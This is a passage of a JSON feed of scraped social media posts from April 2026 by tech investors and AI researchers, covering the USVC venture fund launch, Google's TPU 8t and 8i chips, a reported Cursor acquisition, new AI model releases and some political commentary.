VC fund, but I’m actually getting access to a fund-of-funds that can do direct, secondary, and fund investments. A typical fund-of-funds charges another 1/10 (fees/carry) on top of the VC’s 2/20, for a total of 3/30.\n\nSome other things I learned:\n\nEarly-stage. Early-stage deals are planned. I would rather invest now in case those early-stage investments get marked up quickly. These deals will be riskier and more illiquid, so there’s no free lunch here. The current portfolio includes late-stage (OpenAI, Anthropic, xAI) and mid-stage (Sierra, Vercel, Crusoe, Legora).\n\nIlliquidity. This is venture capital. The underlying investments are illiquid. Don’t invest if you’re uncomfortable with illiquidity. That said, USVC is working on redemptions of up to 5% of the fund every quarter. It’s not guaranteed, but if it’s offered, you can choose to get partial liquidity along the way.\n\nInternational. There is a lot of demand from international investors. USVC is not yet set up to accept international investors at scale, but they’re working on it.\n\nSales load. There is no sales load. USVC is only available on usvc dot com and the sales load is waived if you buy through the site. In the future, brokers that list USVC may charge up to a ~3% sales load; that’s how they make their money.\n\nDisclosure: I’m a co-founder of AngelList and have shares in the business.", + "url": "https://nitter.net/nivi/status/2047471220451578132#m", + "published_at": "2026-04-24T00:22:33+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。", + "url": "https://nitter.net/Svwang1/status/2047470402725921150#m", + "published_at": "2026-04-24T00:19:18+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why the biggest fintech players are in for a shock.\n\n\"The shift is from human UX to agent UX.\n\nIn the past, you won with dashboards, design and user experience.\n\nNow, the buyer is an AI agent, and it only cares about APIs, performance and integration.\n\nThat breaks traditional moats and puts even the biggest fintech players at risk.\" @jasonlk\n\nLove to hear your thoughts @pedroh96 @awxjack @sebatklarna @fintechjunkie", + "url": "https://nitter.net/HarryStebbings/status/2047461264998478113#m", + "published_at": "2026-04-23T23:43:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇", + "url": "https://nitter.net/maddenifico/status/2047454244781818205#m", + "published_at": "2026-04-23T23:15:06+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\n\"I used to think MAUs and WAUs did not matter, now I think they are critical.\n\nIn the AI era, usage is the leading indicator of value.\n\nIf your usage is growing faster than revenue, you are building something people truly want.\" @jasonlk\n\nLove to hear your thoughts on this @joshelman @kirbyman01 @Joshuabrowder @an21m @mignano and how your thoughts on what matters changed?", + "url": "https://nitter.net/HarryStebbings/status/2047426032840634830#m", + "published_at": "2026-04-23T21:23:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://nitter.net/adityaag/status/2047421448449630379#m", + "published_at": "2026-04-23T21:04:47+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. \n\nThere were next to no signs 20VC was or would be a success. \n\nHe has been a dear friend ever since!", + "url": "https://nitter.net/HarryStebbings/status/2047413285675290984#m", + "published_at": "2026-04-23T20:32:21+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://nitter.net/JeffDean/status/2047408945950802186#m", + "published_at": "2026-04-23T20:15:06+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://nitter.net/JeffDean/status/2047407537566495033#m", + "published_at": "2026-04-23T20:09:30+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://nitter.net/JeffDean/status/2047405389856297387#m", + "published_at": "2026-04-23T20:00:58+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://nitter.net/JeffDean/status/2047403921912873257#m", + "published_at": "2026-04-23T19:55:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"don't retweet this, don't retweet this, don't retweet this...\"\n\nah fuck it, life imitates art.", + "url": "https://nitter.net/sama/status/2047403771416940715#m", + "published_at": "2026-04-23T19:54:32+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work.\n\nLet us know if you'd like to do it at your company!", + "url": "https://nitter.net/sama/status/2047395562501411058#m", + "published_at": "2026-04-23T19:21:55+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "embers", + "url": "https://nitter.net/sama/status/2047392357482639749#m", + "published_at": "2026-04-23T19:09:11+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up to find completed sweep dashboards and samples, never having touched code or a terminal at all", + "url": "https://nitter.net/tszzl/status/2047386955550470245#m", + "published_at": "2026-04-23T18:47:43+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: New in the Codex app:\n\n- GPT-5.5\n- Browser control\n- Sheets & Slides\n- Docs & PDFs\n- OS-wide dictation\n- Auto-review mode\n\nEnjoy!", + "url": "https://nitter.net/ajambrosino/status/2047381565534322694#m", + "published_at": "2026-04-23T18:26:18+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️\n\nRead for free or purchase in print ➡️ https://archive.org/details/vanishing-culture-2026", + "url": "https://nitter.net/internetarchive/status/2047378161860776085#m", + "published_at": "2026-04-23T18:12:46+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://nitter.net/liuliu/status/2047374234004115719#m", + "published_at": "2026-04-23T17:57:10+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://nitter.net/eladgil/status/2047373700643844303#m", + "published_at": "2026-04-23T17:55:03+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Does the $60BN Cursor Deal Make Sense:\n\n\"It actually makes sense when you look at what each side lacks.\n\nOne has explosive revenue but weak margins due to compute and model costs.\n\nThe other has massive compute and models but no real revenue.\n\nPut them together and it solves both problems.\" @rodriscoll\n\nLove to hear your thoughts on this @levie @ttunguz @matanSF @shaunmmaguire @beffjezos @martin_casado", + "url": "https://nitter.net/HarryStebbings/status/2047371926335857036#m", + "published_at": "2026-04-23T17:48:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://nitter.net/eladgil/status/2047365014500389353#m", + "published_at": "2026-04-23T17:20:32+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://nitter.net/eladgil/status/2047364865527075139#m", + "published_at": "2026-04-23T17:19:56+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "It is a very expensive desire to be a value investor today. \nIt is much easier to be a momentum investor, that is for sure.", + "url": "https://nitter.net/HarryStebbings/status/2047358263868436791#m", + "published_at": "2026-04-23T16:53:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://nitter.net/JeffDean/status/2047339995682529313#m", + "published_at": "2026-04-23T15:41:07+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career\n\nThousands of people ended up subscribing for literally tens of millions of dollars\n\nWhile most of the reception was positive, there was some interrogation on a few important topics:\n\n1 - The USVC fee structure\n2 - The Investment Strategy\n3 - Support for International Investors\n\nLet's talk about them\n\nThe USVC Fee Structure\n\nIf you have followed me for any amount of time, you'll know this is a personal topic for me.\n\nI've frequently complained about fees in financial services. From VC funds to wealth advisors, I've taken no prisoners in calling these out.\n\nThe last venture capital fund I ran was the only VC fund I know of that raised more than 50M and didn't charge a penny of management fees.\n\nSo how much does USVC actually charge and why it is so much?\n\nUSVC costs 2.5% all-in to investors today\n\nThere are some misconceptions based on reading our prospectus, including:\n\n- A 3% sales load\nPlatforms that offer USVC could charge this if they wanted, but we don't. If you buy on http://USVC.com as everyone yesterday did, you pay no sales load.\n\n- Underlying fund fees\nEarly investments from USVC have been in funds that have their own fees, and these fees are paid by USVC. However, these management fees are already included in the net expense ratio of 2.5%.\n\nIn time, I'm planning to move a meaningful chunk of the portfolio to be direct investments in startups on the cap table which will have 0 underlying fees or carry.\n\nThe 2.5% fee is inclusive of everything, including our management fee.\n\n- The advertised 3.61% today\nRight now, even though you pay 2.5%, it costs us 3.61% to service this product.\n\nThere are two big reasons for this - the underlying fund fees (which we're working to improve with direct investments) and the fact that operationally running these types of funds is very expensive.\n\nWe've decided to absorb the fees excess of 2.5% for at least the first year.\n\nDuring the time, we're going to make more efficient investments and wait for economies of scale to kick in on operational costs.\n\nNow... you may ask: isn't 2.5% still very expensive?\n\nThe answer is... it depends.\n\nTop venture capital firms charge that just on their management fees, and force you to pay that for 10 years.\n\nAnd then they charge 20% of profits on top of that!\n\nWe charge no carry on our direct investments at all, which makes this 2.5% fee attractive for the asset class.\n\nIt's ironic to call this a cash grab when we are subsidizing this product out of our pocket to keep the fees in line\n\nI encourage everyone to go read the full disclosures and prospectus at http://usvc.com.\n\nStay tuned for Part 2 later today on Investment Strategy", + "url": "https://nitter.net/ankurnagpal/status/2047334901033123913#m", + "published_at": "2026-04-23T15:20:52+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear designed to intimidate a journalist for revealing potential abuses, the message is unmistakable: be quiet or be targeted. That’s how fear replaces truth. That’s how a free press is pushed toward silence. And that’s how democracies start to collapse.", + "url": "https://nitter.net/Weinsteinlaw/status/2047321581966291154#m", + "published_at": "2026-04-23T14:27:57+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF\nYoutube 👉 https://youtu.be/s61XVZAt5ns\nApple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acquired-for-%2460bn-by-xai-anthropic-hits/id958230465?i=1000763211245", + "url": "https://nitter.net/HarryStebbings/status/2047316269465006363#m", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This is the big f**king deal.\n\nCursor acquired for $60BN by xAI\n\nI sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week:\n\n- Anthropic Hits $1TRN in Secondary Markets\n- Anthropic Launches Claude Code\n- Rippling Hits $1BN in ARR\n- Cerebras Files for IPO\n\nMy notes below:\n\n1. This $60B deal actually makes sense\n\nThe potential $60 billion acquisition of Cursor by xAI/SpaceX is an industrial \"marriage made in heaven\". Cursor has an exploding business with billions in ARR but \"shitty\" gross margins because they lack their own compute and models. Elon Musk has the massive Colossus GPU data center and a model (Grok) but effectively no revenue, making the vertical integration of these two companies a strategic fix for both.\n\n2. How Claude Design Will Hurt Figma\n\nAnthropic’s Claude Design is a full design application, not just a set of prompts or skills. It poses an existential threat because it allows product and engineering teams to bypass the traditional 30-day designer turnaround. By enabling \"normal people\" to design and move into production immediately, it will \"maim and nibble\" at Figma’s growth over the coming quarters.\n\n3. I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\nIn the B2B world, usage metrics like MAUs, WAUs, and DAUs are now more critical than revenue. If usage isn't growing faster than revenue, it's a sign of a struggling startup or \"stealth churn,\" where users have stopped active engagement despite the company still collecting fees. In the AI age, the ultimate test of a product's value is whether people are actually using its AI features daily.\n\n4. Why the biggest fintech players are in for a shock.\n\nExisting moats for fintech giants like Brex and Ramp are weakening as the selection criteria for vendors shifts. Customers are no longer prioritizing a dashboard's UI; they care which API works best with their autonomous AI agents. If a new vendor offers a superior API that allows an \"AI VP of Finance\" to automate tasks like collections, companies will switch vendors in a single week.\n\n5. Agent fabric is the layer that manages all your agents\n\nThe defining 2027 challenge is the \"agent fabric\". The infrastructure needed to manage and secure hundreds of autonomous agents. This gives a massive advantage to incumbents like Salesforce. They are positioning themselves as the trusted governance layer to guardrail agents and prevent them from going rogue", + "url": "https://nitter.net/HarryStebbings/status/2047316267858645088#m", + "published_at": "2026-04-23T14:06:50+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://nitter.net/hardmaru/status/2047191747793649805#m", + "published_at": "2026-04-23T05:52:02+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.", + "url": "https://nitter.net/perplexity_ai/status/2047145172337836139#m", + "published_at": "2026-04-23T02:46:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices", + "url": "https://nitter.net/DavidSacks/status/2047104229773279572#m", + "published_at": "2026-04-23T00:04:16+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a meritocracy. AI models should not be taught that this practice is justified.", + "url": "https://nitter.net/DavidSacks/status/2047103978979119580#m", + "published_at": "2026-04-23T00:03:16+00:00", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://nitter.net/CryptoCred/status/2047079463750377958#m", + "published_at": "2026-04-22T22:25:51+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://nitter.net/eladgil/status/2047052737762980083#m", + "published_at": "2026-04-22T20:39:39+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. \n\nUnlike our previous post trained models, this model has been trained to be good at search and tool calls simultaneously, allowing us to unify the tool call router and summarization together in one model. \n\nThe resulting model performs better than GPT and Sonnet in terms of cost efficiency to serve daily Perplexity queries in production. The production model runs on our own inference platform.\n\nWe’re already serving a significant chunk of our daily traffic with this model and intend to have it serve all of default traffic pretty soon. \n\nMore research to follow soon on models we’re training and deploying for Comet and Computer.", + "url": "https://nitter.net/AravSrinivas/status/2047019688920756504#m", + "published_at": "2026-04-22T18:28:20+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers.\n\nOur SFT + RL pipeline improves search, citation quality, instruction following, and efficiency.\n\nWith Qwen models, we match or beat GPT models on factuality at a lower cost.", + "url": "https://nitter.net/perplexity_ai/status/2047016400292839808#m", + "published_at": "2026-04-22T18:15:16+00:00", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "title": "\"Self-control is empathy with your future self.\" - Seinfeld", + "url": "https://nitter.net/morganhousel/status/2047013991046881663#m", + "published_at": "2026-04-22T18:05:41+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://nitter.net/naval/status/2046991137022648800#m", + "published_at": "2026-04-22T16:34:52+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://nitter.net/liuliu/status/2046986486629986435#m", + "published_at": "2026-04-22T16:16:24+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Announcing my new thing:\n\nI'm launching a new public venture fund\n\nUSVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future\n\nAnd unlike traditional venture funds, everyone can invest along with just $500:", + "url": "https://nitter.net/ankurnagpal/status/2046961436593713241#m", + "published_at": "2026-04-22T14:36:51+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: \n\n1. Nik Storonsky (Revolut) \n\n2. @alanchanguk (Fuse Energy) \n\n3. Adam Foroughi (AppLovin) \n\n4. @awxjack (Airwallex) \n\n5. @MaxJunestrand (Legora)\n\nOk one more… \n\n6. @vladtenev (Robinhood) \n\nPS. No order intended.", + "url": "https://nitter.net/HarryStebbings/status/2046938853445959738#m", + "published_at": "2026-04-22T13:07:07+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What a time to be alive", + "url": "https://nitter.net/eladgil/status/2046722094348771758#m", + "published_at": "2026-04-21T22:45:48+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "👀", + "url": "https://nitter.net/eladgil/status/2046695194054320150#m", + "published_at": "2026-04-21T20:58:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 CEOs of the largest companies over the last 10 years. \n\nAdam Foroughi is top 5 I have ever met. Easily. \n\nAppLovin Market Cap: $160BN \n\nRevenue: $5.48BN \n\nEBITDA per Head: $10M\n\nThere is no company on the planet with numbers like AppLovin. \n\nEpisode coming 👇", + "url": "https://nitter.net/HarryStebbings/status/2046684883494600911#m", + "published_at": "2026-04-21T20:17:56+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱", + "url": "https://nitter.net/eladgil/status/2046674350993223784#m", + "published_at": "2026-04-21T19:36:05+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/", + "url": "https://nitter.net/ceo_clickhouse/status/2046673188193701901#m", + "published_at": "2026-04-21T19:31:28+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "AI for email++", + "url": "https://nitter.net/eladgil/status/2046640542218604783#m", + "published_at": "2026-04-21T17:21:44+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "As agentic workloads expand, the best orchestration hybridizes centralized servers and CPUs for the ultimate continuity. Especially when you want your AI to use your local apps and messages.", + "url": "https://nitter.net/AravSrinivas/status/2046638770162995603#m", + "published_at": "2026-04-21T17:14:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: The future of computer vision is agentic.\n\n1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in structure, but weakly grounded in what's actually in the video.\n\nThis limitation shows up in cases like \"rolling stops\". Is the stop sign actually associated with the vehicle’s lane? Does the ego vehicle ever come to a full stop, or only decelerate?", + "url": "https://nitter.net/nomadicai/status/2046635685206208533#m", + "published_at": "2026-04-21T17:02:26+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have access to Google's Paper Assistant Tool (PAT) to help improve their submissions. \n\nThis program offers authors the opportunity to receive free, automated, and actionable feedback on their manuscripts before the final deadline, private to the authors. It is a completely optional service that is kept strictly private to the authors and will not be used in the review process.\n\nRead more in our blog post: https://blog.neurips.cc/2026/04/21/neurips-supports-authors-with-googles-paper-assistant-tool-pat/", + "url": "https://nitter.net/NeurIPSConf/status/2046632664493384060#m", + "published_at": "2026-04-21T16:50:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: This is insane…\n\nThe Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\"\n\nIn reality, it turns a state that Kamala barely won by 5 pts from 6D-5R to 10D-1R.", + "url": "https://nitter.net/Geiger_Capital/status/2046632586735243420#m", + "published_at": "2026-04-21T16:50:07+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "In a world of agents, how do software providers prevent themselves from becoming valueless databases?\n\n\"The value proposition has to be:\n\n1. How good are your APIs?\n\n2. How well designed are they\n\n3. Are they ready for agents?\n\n4. Can you monetize that in some way?\n\nWe are treating software too much like one monolithic industry.\n\nThere's a lot of categories of software where agents using the tools is a massive boon for the technology as opposed to a dilemma.\" @levie\n\nLove to hear your thoughts on this @Benioff @dharmesh @mcannonbrookes @rauchg @mcuban", + "url": "https://nitter.net/HarryStebbings/status/2046614183513604299#m", + "published_at": "2026-04-21T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "⌘ ⌘", + "url": "https://nitter.net/AravSrinivas/status/2046606492649091212#m", + "published_at": "2026-04-21T15:06:26+00:00", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "title": "RT by @morganhousel: I’m in love with this sentence:\n\n“The best math you can learn is how to calculate the future cost of current decisions.”", + "url": "https://nitter.net/readswithravi/status/2046429717834654025#m", + "published_at": "2026-04-21T03:24:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Whoa 🤯", + "url": "https://nitter.net/morganlinton/status/2046419556424675677#m", + "published_at": "2026-04-21T02:43:37+00:00", + "source": "nitter" + }, + { + 